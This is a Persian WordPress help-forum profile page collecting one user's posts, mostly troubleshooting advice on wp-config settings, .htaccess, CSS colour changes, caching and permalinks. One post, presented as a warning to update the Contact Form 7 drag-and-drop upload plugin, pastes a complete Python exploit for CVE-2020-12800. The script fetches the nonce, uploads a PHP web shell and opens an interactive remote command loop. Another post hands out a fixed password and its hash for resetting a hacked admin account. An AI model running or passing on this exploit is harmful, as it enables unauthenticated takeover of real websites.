-
تعداد ارسالها
217 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
17
نوشتهها ارسال شده توسط damoon_zero
-
-
چيزی مثل اين و کلمه عبور به خودی خود تغيير نمی کنه !
بايد حتماً برای فايل های بکدور و پاکسازی اقدام کنيد !
از phpmyadmin به ديتابيس سايت بريد ...
table مخصوص User ها رو واردش بشيد
برّسی کنيد بغير از يوزر admin يوزر ديگه اي ساخته نشده باشه با دسترسی ادمين
ايميلی که برای يوزر admin ست شده رو برّسی کنيد که ايميل خودتون باشه ...از ديتابيس پسورد رو به کد زيرتغيير بديد
با پسورد HashHashNoHack لاگين کنيد . ( حساس به حروف بزرگ وکوچيک )
هشدار : ممکنه صفحه لاگين دستکاری شده باشه ...
$1$hjL685nj$hMMXg8utzwgdCOnyxL4MT1
-
در 1 ساعت قبل، saeedator گفته است :
دیتابیس رو برای نام نوشته ریستور کنم؟
اطلاعات دیتابیس پاک نمیشه؟مگه نگفتيد قبل تغييرات بک آپ گرفتيد از ديتابيس ؟
-
در 1 ساعت قبل، saeedator گفته است :
فالس کردم نشد
الان رفتم ورژن php رو تغییر دادم وارنینگ رفتمن بخاطر این وارنینگ کوفتی پیوندارو تغییر دادم
حالا این درست شد
اون مشکلو چیکار کنم حالا؟؟
گفتم که PHP Version !!!! احتمالاً يه افزونه ....
ديتابيس رو ريستور کنيد ... -
-
در 1 ساعت قبل، saeedator گفته است :
دیباگ رو هم غیر فعال کردم بازم میاد اون وارنینگ :((((
دیگه داره کلافه م میکنه |:اگه کد زير رو تو فايل wp-config.php داريد False کنيدش
define('WP_CACHE', true);
-
در 2 ساعت قبل، سولماز گفته است :
سلام
من میخوام تمام ایمیل هایی که برام ثبت میشه توی سایتم رو بتونم براشون یک ایمیل تبلیغاتی بفرستم. افزونه خاصی وجود داره؟ من اولین بارمه میخوام انجام بدم اگر امکانش هست یک توضیحات بیشتری بدید ممنونم ازتون
يعنی مايل هستيد بطور دسته جمعی ايميل بفرستيد يا دونه دونه اوتوماتيک ؟
تا اونجايی که من ميدونم ارسال دسته جمعی ايميل بصورت عادی از سايت ميتونه باعث بشه
ميل سرور و يا آدرس ايميل شما توسط سرويس دهنده ايميل ها بلاک بشه و ايميل های ارسالی شما
اسپم شناخته بشه !
البته من خودم ميخواستم اين کار رو بکنم و به اين نتيجه رسيدم که بايد از جاهايی که خدمات ايميل مارکتينگ ميدن استفاده کرد تا اين اتفاق نيافته !
حالا اگه دوستان اطلاعات بهتر يا بيشتر يا راه حلی دارن منم خوشحال ميشم بدونم ....- 2
-
در 1 ساعت قبل، saeedator گفته است :
والا اولش فک میکنم از wp-rocket شرو شد، بعد فک کنم سرایت کرده بود به یوآست و یوآست نمیتونست جداول دیتابیس رو بسازه
با پشتیبانی هاستم صبت کردم گفتن نه ربطی به تنظیمات سمت سرور نداره
پلاگین پاک کردم، نصب کردم، از جاهای مختلف دان کردم و نصب کردم هیچ تاثیری نداشت و اون ارور بلندی که ابتدای بحث درج کردم میومدتا پریروز که یکی از دوستان گفت تنظیمات پیوند یکتارو بذار رو ساده دوباره برگردون که دیگه برنمیگرده رو نام نوشته
تم رو هم عوض کردم نشد
به جداول دست نزدمازش بکاپ گرفتم
روی ی دامنه دیگه وردپرس نصب کردم
اون جداول رو روی اون تست کردم
رو اون که میبرم اونم خراب میشه
جداول خودشو فعال میکنم درست میشه
اوّلاً که اشتباه نکنيد اون خط ها خطا نيستن بلکه Warning هستن و اگه سايت شما بدون مشکل داره کار ميکنه برای اينکه Warning ها ديده نشه ميتونيد از
فايل wp-config.php خط Debug رو پيدا کنيد False کنيد تا Warning ها نمايش داده نشه ! و اين Warning ميتونه بخاطر يه افزونه باشه
مثلا يه افزونه که قديمی بوده و قبلاً با يه ورژن از PHP که رو هاستتون بوده داشته خوب کار ميکرده ... ورژن PHP آپديت شده و اون افزونه با ورژن جديد دچاره اختلال شده باشهبرای عدم نمايش Warningها تو فايل WP-Config.php پيدا کنيد و به False تغيير بديد مثل کد زير :
define( 'WP_DEBUG', false );
-
در 2 ساعت قبل، saeedator گفته است :
سلام، نه نشد البته این کدارو قبلا گذاشته بودم ولی سر این قضیه پاک کردم، یه نکته ای که ابتدا عرض کردم این بود که ظاهرا تو جداول دیتابیس postname رو اصن تشخیص نمیده که بخواد ترمیمش کنه یا ریدایرکت و ...
و وقتی یجدول پست دیگه از یه سایت دیگه میذارم همه چی درست میشه!
البته حدس میزنم که سایر دوستان هم به این مشکل بر خوردن قبلا و حتما ی راه حلی داره ولی فعلا که داستان دارم من
اگر راه حل دیگه ای بنظرتون داره بفرمایید تست کنم
ممنون از لطفتون
چطور شد که اين Warning رو دريافت کرديد؟
مشکل دقيقاً از کجا شروع شد ؟
فکر نمی کنم به تيبل ديتابيس ربطی داشته باشه . شايد نبايد تغييری ميداديد توش
مشکل می تونه بخاطر يه پلاگين هم باشه !پلاگين ها رو غير فعال کرديد و ببينيد مشکل هنوز هست يا نه ؟ تم رو عوض کرديد تست کنيد ؟
-
اينم برای دکمه شاپينگ کارت اون بالا
بجای عبارت yellow تو کد زير کد رنگ مورد نظر خودتون رو وارد کنيد
.trigger-mini-cart { background-color: yellow !important; }
- 2
-
در 1 ساعت قبل، OfflineBaz گفته است :
از کنترل پنل مديريت وردپرس وارد قسمت نمايش بشيد .
از منوی باز شده سفارشی سازی رو انتخاب کنيد
از ليست سمت راست به قسمت css اضافی بريد
کد زير رو اونجا بزاريد و از بالا دکمه انتشار رو بزنيد ..cat-nav-trigger { background-color: blue !important; } .main-navigation { background-color: red; } .top-header { background-color: red !important; }
ميتونيد کد رنگ مورد نظرتون رو تو کد بالا وارد کنيد بجای red و blue کد هکس رنگ دلخواهتون رو وارد کنيد .
برای قسمتدکمه Search آيدی و يا کلاسی نداشت که بشه براش css نوشت !
بايدبتونم فايل های قالب رو ببينم ... ولی فکر نمی کنم از خود تنظيمات قالب نشه ويرايش کرد
مطمئن هستيد که نميشه ؟- 2
-
امروز ديدم يه باگ خطرناک از نوع Remote Code Execution يعنی اجرای دستور از راه دور گزارش شده
اگه از اين افزونه استفاده می کنيد حتماً آپديت کنيدش !!!!اکسپلويت اين حفره امنيتی هم اينجا ميزارم تا ببينيد
#!/usr/bin/python import string import random import requests from bs4 import BeautifulSoup import sys payloadurl="" def RecurseLinks(base,file): headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"} f = requests.get(base, headers=headers) soup = BeautifulSoup(f.content, "html.parser") for root in soup.find_all("a"): href = root.get("href") if (href.startswith("/")): do = "nothing" elif (href.endswith("/")): RecurseLinks(base + href, file) else: if file in href: print ("\n[+] File Found --> " + base + href) global payloadurl payloadurl = (base+href) def main(): #os.system('cls') print("WordPress Plugin \'Drag and Drop Multiple File Upload - Contact Form 7\' 1.3.3.2 - Unauthenticated Remote Code Execution") print("@amartinsec --> Twitter\nCVE:2020-12800\n") #Build The Request #Generate random URL for filename file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6)) urlinput = raw_input("[+] Enter url to the vulnerable WordPress application: ") #Finding the nonce used in the Ajax security string print ("\n[+] Searching for security string nonce") headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} homepage = requests.get(urlinput,headers=headers) homepage = homepage.text homepage = homepage.split("ajax_nonce\":\"",1)[1] securitykey = homepage[:10] print("[+] Found security string --> " + securitykey) url = urlinput + "/wp-admin/admin-ajax.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------350278735926454076983690555601", } data = "-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n" \ "php%\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n" \ "5242880\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n" \ "dnd_codedropz_upload\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"type" \ "\"\r\n\r\nclick\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"security\"\r" \ "\n\r\n" + securitykey +"\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"upload-file\"; " \ "filename=\"" + file +".php%\"\r\nContent-Type: text/plain\r\n\r\n" \ "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>" \ "\r\n-----------------------------350278735926454076983690555601--\r\n" print "\n[+] Sending payload to target" response = requests.post(url, headers=headers, data=data) if "200" in str(response): print("[+] Looks like a successful file upload!\n") elif "403" in str(response): print("\nFile Upload Failed") print("403 in response. Check security string") sys.exit(1) else: print("File upload failed. Try the manual way with Burp") sys.exit(1) print("[+] Crawling for the uploaded file. This may take a minute...") print("[+] Searching for " + file + ".php") RecurseLinks(urlinput + "/wp-content/uploads/",file) if payloadurl == "": print("Can't find the file on the web server") print("Try the manual method") sys.exit(1) #If all goes well, we can now send requests for RCE print("[+] Success\n") while True: cmd= raw_input("[+] CMD: ") headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} request = requests.get(payloadurl + "?e=" + cmd, headers=headers) print request.text if __name__ == "__main__": main()
من هر روز تمام لاگ های وبسايت و سرورم رو نگاه می کنم تا اگه چيز مشکوکی بود برّسی کنم !
يکی هم هست که داره تلاش می کنه ... ولی بدجوری دستش کوتاه بيچاره
به هر حال ديدم با اينکه من اين افزونه رو نصب ندارم ولی تلاش کرده اين حفره رو رو سايت من اکسپلويت کنه بروز کار ميکنه حيوونی ...- 1
-
در 1 ساعت قبل، saeedator گفته است :
سلام؛ این کار رو هم انجام دادم ولی نشد متاسفانه
اوّل فايل .htaccess رو تغيير نام بديد به .htaccess.old
يک فايل .htaccess جديد درست کنيد و محتويات زير رو توش بزاريد و Save کنيد ببينيد درست شد ؟# BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress
-
در 22 ساعت قبل، zaubel2040 گفته است :
زابل درجهت تکمیل کادر خود نیروی می پذیرد.
جهت راه اندازی درگاه پرداخت وب مانی یا پرفکت مانی
و تکمیل فرایند امنیت پرداخت ،
رزومه خود را ارسال فرمایید تا به عنوان مشاور ساعتی
یا پروژه ای یا پاداشی با شما همکاری انجام گیرد.
راه های ارتباطی:
09121457091 واتس آپ
zaubel2040@gmail.com
سه شنبه 6 خرداد 1399
bet ?
-
در در ۱۳۹۹/۳/۵ at 16:41، OfflineBaz گفته است :
ممنون میشم به نگاه به قالب ارکید بندازین نوار منو بالا و پایین میخوایم رنگاشونو عوض کنم همراه با رنگ فونت حالت هاور هم میخوام از بین ببرم روی کل سایت
+ لطفاً آدرس سايتی که اين قالب رو روش نصب کرديد بگيد .
+ اسکرين شات بگيريد و قسمت هايی که مايليد عوض بشه رنگش رو بگيد
+ کد رنگ مورد نظرتون رو بديد ... رنگ رو عوض کنيم تا ادامه کار برسيم به هاور -
در در 5/24/2020 at 06:59، OfflineBaz گفته است :
داخل تنظیمات قالب در پنل گزینه تغییر رنگ داره ولی کلی تغییر میکنه من میخوام قسمتهای که مد نظر دارم رنگشون عوض کنم نه همشو
با Inspect Element اون قسمت رو پيدا کنيد و با استفاده از Custom CSS از خود پنل وردپرس تو قسمت نمايش با CSS بهش رنگ دلخواهتون رو بديد
من کور کورانه دارم ميگم اگه لينک بديد شايد بهتر بتونم کمکتون کنم- 1
-
در 2 ساعت قبل، OfflineBaz گفته است :
دوست عزیز میشه کمک کنید در مورد ویرایش قالب ارکید من نتونستم رنگ نوار منو رو عوض کنم فقط نوار منو میخوام سفارشی سازی کنم بعضی قسمتها رو بتونی کمکم کنی ممنون میشم
من تاحالا از اين قالب ها استفاده نکردم .
اگه دسترسی بدی تا بتونم برّسی کنم هر کمکی از دستم بر بياد با کمال ميل بهتون کمک ميکنم
-
در 8 دقیقه قبل، abbba@chmail.ir گفته است :
چطوری میتونم کد های صفحه صورتحساب رو ویرایش کنم ؟؟
فک کنم از اون باشه
از اين آدرس ميتونيد اين صفحه ها رو ويرايش کنيد:
/wp-content/plugins/woocommerce/templates/checkout/
-
-
-
در 3 دقیقه قبل، abbba@chmail.ir گفته است :
لطفاً لينک بزاريد
-
در در 5/17/2020 at 10:43، saeedth گفته است :
با سلام
من سایت روی سرور بردم سایت بدون مشکل کار می کند. فقط یک مسئله ای هست که لوگو در مرورگر کامپیوتر من بر روی سایت نشان داده می شود ولی بروی مرورگر های کامپیوتر کاربرهای دیگر نشان داده نمی شود
در صورتی که مرورگر کامپیوتر من و دیگر کاربران از دیتابیس سرور استفاده می کند.
اگه از افزونه کش مثل wp rocket cash استفاده ميکنيد يک بار از افزونه کش رو Clear کنيد و دوباره امتحان کنيد
البته همونطور که دوستمون asadiy4n گفتن ، کش مرورگر رو هم به همراه کوکی ها پاک کنيد و دوباره امتحان کنيد- 1
-
در 19 دقیقه قبل، abbba@chmail.ir گفته است :
با سلام
من سایت رو از هاست دیگه با افزونه duplicator pro بکاپ گرفتم و تو هاست دیگه نصب کردم
اما مشکلم اینه که بعد از نصب از پیشخوان وردپرس مشاهده سایت رو میزنی سایت بالا میاد ولی تو مرروگر ادرس سایت رو میزنی بالا نمیاد و صفحه سفید نشون میده
البته قبلش مشکل ssl رو داشت که نصب کردم تو هاست و افزونه SSL رو الان نمیدونم مشکل از چیه
ممنون میشم راهنمایی کنید
اوّل از کنترل پنل هاست قسمت PHP گزينه نمايش ERROR ها رو فعال کنيد !
همينطور تو فايل wp-config قسمت DEBUG رو TRUE کنيد و ERROR ها رو اينجا بزاريد تا ببينيمنکته :
ممکنه تو هاست قبلی از نسخه اي از PHP استفاده ميکرديد که افزونه يا وردپرس شما قديمی بوده و با اون نسخه کار ميکرد و با نسخه PHP که رو هاست جديد فعاله داره خطا دريافت ميکنهافزونه ها رو غير فعال کنيد و سايت رو چک کنيد . اگه مشکل برطرف شده بود دونه دونه افزونه ها رو فعال کنيد تا به افزونه اي که باعث خطا شده برسيد و پيداش کنيد
تم رو عوض کنيد ببينيد باز سايت بالا نمياد ؟
- 1
- 1
-
در 16 ساعت قبل، Abolfaxl گفته است :
باسلام
بنده داخل یکی از صفحات سایت از یک اسلاید استفاده کردم.
هتگامی که افزونه فعال میباشد ولی در افزونه yost seo پیام بیش از حد بودن تگ h1 در صفحه رو میده ولی من کل لایه های متنی داخل اسلایدر رو که متن داشتن به h2 و h3 تغییر دادم با این شرایط باز همون پیغام رو دریافت میکنم.
با تشکر.
لينک لطفاً ...
-
پیوند یکتا یا permalink چیست ؟
permalink یا permanentlink چیست ؟
permalink که با نام پیوند یکتا نیز شناخته شده است از ترکیب دو کلمه که permanent و link میباشد و معنی آنها پیوند یا ارتباط ثابت و دائمی می باشد استفاده شده است. نحوه آدرس دهی پیوند یکتا یا permalink این است که به یک آدرس صفحه یا مطلب اشاره دارد .
permalink یا پیوند یکتا در ورد پرس به صورت پیش فرض به صورت زیر است :
آدرس بالا ظاهر زیبایی برای کاربر ندارد و برای کاربر مفهمومی نیست و آدرس مطلب رو به صورت نامفهوم نشان می دهد . شاید کاربر بخواهد در جریان این باشد که مطلب از کدام دسته است یا اسم دسته را هم ببیند . حال سوال این است که آیا میتوان یک آدرس نازیبا را به یک فرم و شکل ایده آل تغییر داد ؟ جواب بله است . در ادامه به این موضوع خواهیم پرداخت
دلیل استفادهازpermalink چیست؟
همانگونه که بیان شده پیوندهای یکتا به یک مطلب و یک آدرس خاص اشاره می کند . و تا هر زمان که این مطلب در سایت وجود داشته باشد آن آدرس هم وجود دارد . پس کاربر بدون هیچ ترسی می تواند از آدرس ها در وبلاگ ها استفاده کند.
ارتباطpermalink وseo درچیست؟
permalinks یا پیوندهای یکتا تاثیر مستقیم بر روی سئو سایت دارند و همین نکته باعث گرفتن rank بالاتری در گوگل دارد .
زمانی که کاربر مطلبی را در گوگل سرچ میکند در واقع با سه بخش عنوان وپیوند یکتا یا permalink و توضیحات مواجه می شوددر واقع هر چه از کلمات کلیدی بهتری در عنوان و پیوند یکتا استفاده کنیم سایت ما زودتر به صفحه اول گوگل راه پیدا میکند.
مراحل ایجاد ساختار پیوند یکتا
برای ایجاد ساختار پیوند یکتا در ورد پرس در قسمت تنظیمات در صفحه پیشخوان 5 مرحله باید طی شود که
اولین مرحله همان آدرس پیشفرض یعنی
http://www.example.com/?p=1 بود.
دومین مرحله را به ساختار " روز و نام " پیوندهای یکتا بر اساس سال ، ماه ، روز و نام پست ایجاد میشود.
http://www.example.com/2015/05/04/post-title
سومین مرحله که ماه و نام نیز نام دارد و به سال ، ماه و نام نوشته نیز مشهور است.
http://www.example.com/2015/06/post-title
چهارمین مرحله این ساختار که به ساختار عددی نیز معروف است در واقع به عنوان شماره شناسنامه این پست وجود دارد. در واقع این آدرس فقط و فقط در شرایط خیلی خیلی خاص مورد استفاده قرار میگیرد و اصلا نباید بوسیله وردپرس به عنوان پیوند یکتا مورد استفاده باشد.
http://www.example.com/archive/123
پنجمین مرحله که بسیار مناسب وبلاگهایی است که مطالب کمی در آن قرار میگیرد می باشد به ساختار نوشته معروف است .
http://www.example.com/post-title
اما یک ساختار وجود دارد که به ساختار دلخواه یا سفارشی برای پیوند یکتا معروف استهمانطور که از نام آن پیداست میشود از برچسبها و یا ویزگی های سفارشی برای پیوند یکتا مورد نظر استفاده کرد.
%year%
به سالی که مطلب منتشر شد اشاره دارد مثلا 1396
%monthnum%
به ماهی که مطلب منتشر شد اشاره دارد مثلا 05
%day%
به روزی که مطلب منتشر شد اشاره دارد مثلا 24
%minute%
به دقیقه ای که مطلب منتشر شد اشاره دارد مثلا 30
%second%
به ثانیه ای که مطلب منتشر شد اشاره دارد مثلا 50
%post-id%
به شماره شناسه یکتای پست اشاره دارد مثلا 123
%postname%
به معنی نام نوشته میباشد و زمانی که در حال ثبت یک نوشته هستید با کلیک بر روی قسمت ویرایش پیوند یکتا می توانید اسم و آدرس نوشته را تغییر دهید.
example.com/everything-about-permalink-structure
%category%
این گزینه مربوط به اسم دسته بندی مطلبی است که در حال منتشر کردن آن هستید . یعنی اسم دسته بندی رو درحالت پیوند یکتا به نمایش در می آورد
example.com/wordpress
- 1
مشکل در نام نوشته و ارور The requested document was not found on this server.
در سئو
ارسال شده در
الانم دوباره يه بک آپ بگيريد ... بعد همه table هارو Drop کنيد و بعد اون ديتابيس که قبل تغييرات Export کرده بوديد رو Import کنيد